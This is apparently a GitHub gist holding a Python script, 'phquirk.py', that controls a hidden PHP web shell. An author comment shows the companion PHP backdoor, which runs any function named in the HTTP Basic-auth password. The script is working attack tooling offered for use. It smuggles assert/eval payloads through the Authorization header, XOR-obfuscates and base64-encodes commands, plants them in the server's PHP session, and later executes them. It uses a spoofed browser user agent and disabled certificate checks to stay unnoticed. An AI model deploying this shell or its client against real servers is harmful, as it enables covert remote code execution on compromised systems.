Skip to content

Instantly share code, notes, and snippets.

@enkomio

enkomio/phquirk.py

Created May 13, 2017 19:16
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save enkomio/c6db9cb690bbeac1476fb3e56bf7c1a4 to your computer and use it in GitHub Desktop.
Save enkomio/c6db9cb690bbeac1476fb3e56bf7c1a4 to your computer and use it in GitHub Desktop.
Download ZIP
Script to interact with hidden web shell
Raw
phquirk.py
import httplib2
import binascii
import os
import base64
import sys
if len(sys.argv) < 3:
print "Usage: {0} <url> <command>".format(sys.argv[0])
exit(1)
def generate_random_string(len):
return binascii.hexlify(os.urandom(len))
def xor_obfuscate(data, key):
output = ''
for i in xrange(len(data)):
output += chr(ord(data[i]) ^ ord(key[i % len(key)]))
return output
def send_request(url, data, session_cookie):
try:
auth = base64.b64encode('' + ":" + data)
http = httplib2.Http(disable_ssl_certificate_validation=True)
headers = {
"User-agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36",
"Authorization": 'Basic ' + auth,
"Cookie": session_cookie
}
_, html = http.request(url, 'GET', headers=headers)
return html
except:
return ''
# global variables
url = sys.argv[1]
php_command = sys.argv[2]
session_cookie = "PHPSESSID=" + generate_random_string(13)
shell_key = "shell"
encryption_key = generate_random_string(25)
print "[+] Using session value: " + session_cookie
print "[+] Encryption key: " + encryption_key
###########################################
# step 1 - implant shell in user session #
###########################################
code_exec = """
session_start();
$a = explode("|", $_SERVER['PHP_AUTH_PW']);
$_SESSION[$a[2]] = $a[3];
"""
encrypted_php_command = xor_obfuscate(php_command, encryption_key)
code_install_shell = shell_key + "|" + base64.b64encode(encrypted_php_command)
data = "assert|eval(base64_decode('{0}').';return True;')|{1}".format(base64.b64encode(code_exec), code_install_shell)
send_request(url, data, session_cookie)
print "[+] Installed command in user session"
###########################################
# step 2 - invoke shell stored in session #
###########################################
code_exec = ("""
session_start();
if (array_key_exists("{0}", $_SESSION))
{{
function xor_deobf($str, $key)
{{
$out = '';
for($i = 0; $i < strlen($str); ++$i)
$out .= ($str[$i] ^ $key[$i % strlen($key)]);
return $out;
}}
eval(xor_deobf(base64_decode($_SESSION["{0}"]), "{1}"));
}}
""").format(shell_key, encryption_key)
data = "assert|eval(base64_decode('{0}').';return True;')".format(base64.b64encode(code_exec))
print "[+] Result: " + send_request(url, data, session_cookie=session_cookie)
@enkomio
Copy link
Author

enkomio commented May 13, 2017
edited

It is supposed to interact with the following PHP script:

<?php
if (isset($_SERVER['PHP_AUTH_PW'])) 
{
	$a = explode("|", $_SERVER['PHP_AUTH_PW']);	
	@$a[0]($a[1]);
}
?>

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment